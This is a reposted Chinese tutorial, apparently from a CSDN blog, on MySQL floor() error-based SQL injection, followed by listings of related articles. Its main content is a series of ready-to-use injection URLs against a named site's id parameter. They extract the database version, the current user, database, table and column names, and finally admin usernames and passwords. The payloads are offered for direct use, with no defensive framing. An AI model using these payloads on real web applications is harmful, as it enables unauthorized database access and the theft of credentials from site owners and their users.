20、注入篇—————MYSQL数据库Floor报错注入

最新推荐文章于 2025-09-09 22:46:52 发布
转载 最新推荐文章于 2025-09-09 22:46:52 发布 · 2.4k 阅读 · 9

本文详细介绍了一种名为Floor报错注入的SQL注入技巧,通过构造特定的SQL查询语句,可以获取目标网站的数据库版本、用户名、数据库名、库表名称、表字段名称以及表内容等敏感信息。

通过Floor爆错

数据库版本

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

链接用户

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

链接数据库

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆库 

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆表

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆字段

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆内容

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

至于floor报错注入在网上有不少的非常不错的文章可以看看,本文也是通过转载的,那就推荐下面这几个吧:

http://www.cnblogs.com/wocalieshenmegui/p/5917967.html

http://www.hackblog.cn/post/36.html

http://www.cnblogs.com/xishaonian/p/6227405.html

【漏洞挖掘】——106、Floor报错注入刨析
Fly_鹏程万里
06-21 161
报错注入是一种根据报错信息来构造注入语句并从错误信息中获取数据库信息的一种注入方法,常见的报错注入主要包括以下几种:rand() :可以产生一个在0和1之间的随机数,例如:rand(x):以x为随机数发生器种子值来生成固定随机数,例如:rand()*x:生成0~x之间的伪随机数,例如:FLOOR(x) 函数返回小于 x 的最大整数值,例如:类似的函数还有:通过上面的了解可以发现rand()函数可以生成一个指定范围内的伪随机数(小数),而floor可以取整,那么如果要生成一个整数呢?可以结合将Floor()与
【漏洞挖掘】——110、Bigint报错注入深入刨析
Fly_鹏程万里
06-21 269
数据类型BIGINT的长度为8字节,也就是说长度为64比特,这种数据类型最大的有符号值,用二进制、十六进制和十进制的表示形式分别为"0b0111111111111111111111111111111111111111111111111111111111111111"、"0x7fffffffffffffff"和"9223372036854775807",当对这个值进行某些数值运算的时候,比如加法运算,就会引起"BIGINT value is out of range"错误,例如:\。
floor报错注入
My笔记的博客
09-27 1613
向下取整。
mysql floor报错注入_Mysql报错注入笔记
weixin_42389113的博客
02-01 312
本文章由核心成员Luan原创,未经允许严禁转载。前天写了phpcms的一个注入exp,经过大量测试发现,很多网站明明存在漏洞,我的exp却失败了。多方面分析后,结果不是因为waf,而是因为mysql版本问题。我的exp是使用的报错注入,如果mysql版本过低,某些报错函数就用不了!详细见下文:1.MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()...
Floor报错注入
最新发布
2302_80252080的博客
09-09 645
Floor报错注入是一种利用SQL数据库特性(GROUP BY、RAND()、临时表)触发错误以窃取数据的攻击方式。攻击者通过构造包含随机函数的恶意分组查询,使数据库在创建临时表时因主键冲突报错,并将查询结果(如数据库名、表数据等)包含在错误信息中返回。该攻击需满足特定条件:MySQL版本限制、表中数据量要求等,可通过修改注入语句获取不同信息(库名、表名、字段值等)。典型注入语句包含floor()、rand()、count()等函数组合,利用错误反馈机制实现数据泄露。
mysql floor报错注入_MySQL报错注入总结
weixin_39947351的博客
01-19 221
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。报错注入:(and后不能直接跟select,可以加())1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floor(ra...
mysqlfloor的用法_Mysql报错注入floor报错详解
weixin_32757449的博客
01-19 7106
?利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。基本的查询 select 不必多说,剩下的几个关键字有 count 、group by 、floor、rand。二、关键函数说明?1.ran...
MYSQL floor 报错注入详解
AaronLuo
08-25 4382
MYSQL floor 报错注入 floor() 函数,向下取整 rand() 函数,取随机数,若有参数x,则每个x对应一个固定的值,如果连续多次执行会变化,但是可以预测 floor( rand( 0 ) * 2 ) 产生的序列为011011… 原理 利用数据库主键不能重复的原理,使用 GROPU BY 分组,产生主键key冗余,导致报错 GROPU BY 原理 已知表users如下 ...
初学Web安全之sql注入(二)——报错注入
weixin_47531846的博客
11-20 792
知识补充: 前一提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前提到的单引号双引号判断法,还是有用的。 其实页面有回显,判断出数字型以及字符型还有闭合,还是相对简单的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
SQL注入之——基于函数报错手工注入(insert update delete)
温柔小薛的博客
04-02 1729
基于函数报错手工注入(insert update delete) 目录基于函数报错手工注入(insert update delete)基于函数报错注入常见攻击方法技巧思路背景条件基于报错的信息获取(三个常用的用来报错的函数)实战测试insert注入(注册信息使用函数)update注入(用于用户登陆端修改用户信息)delet注入(删除相关)遇到的问题 基于函数报错注入 常见攻击方法 updata...
深信服技术认证之基于floor( )函数的SQL报错注入
sangfor_edu的博客
06-07 1261
SQL注入(SQL Injection)是一种常见的Web安全漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。...
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
mysql floor报错注入_MySQL报错注入
weixin_33229152的博客
01-27 250
MySQL报错注入简介总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。foor报错注入报错注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的,使得MySQL由于函数的特性返回错误...
Mysql报错注入floor()
teep0的博客
01-08 561
这个sql语句只是为了让整个sql的逻辑不出错,因为select 1 无论from 哪个的集合的结果都是1.即And (slect 1 from (sql)a)=And 1.floor报错注入也可以称为group by 报错注入,也可以归属为:主键报错注入。以上两条注入语句是一样的,其中的别名a和x可以是同名。报错的原因是因为插入重复插入虚拟表主键,数据库报错
mysql floor报错_Mysql报错注入floor报错详解
weixin_35492662的博客
01-19 456
一、简述利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。基本的查询 select 不必多说,剩下的几个关键字有 count 、group by 、floor、rand。二、关键函数说明1.r...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1379
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
mysqlfloor方法_mysqlfloor()报错注入方法详细分析
weixin_29067143的博客
01-20 697
刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句。本着刚开始学习一定要弄明白的态度,在此做个总结。(更好的阅读体验可访问 这里 )首先,只要该语句明白了,那么类似select count(*),(floor(rand(0)*2))x from table group by x;这样的变形语句基本上都...
sql注入实战报错注入
03-14
报错注入(Error-Based SQL Injection)是一种通过触发数据库错误消息来提取数据的技术。这种方法通常用于无法直接从页面获取查询结果的情况下,例如 `INSERT`、`UPDATE` 或 `DELETE` 查询[^1]。 当应用程序未正确...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值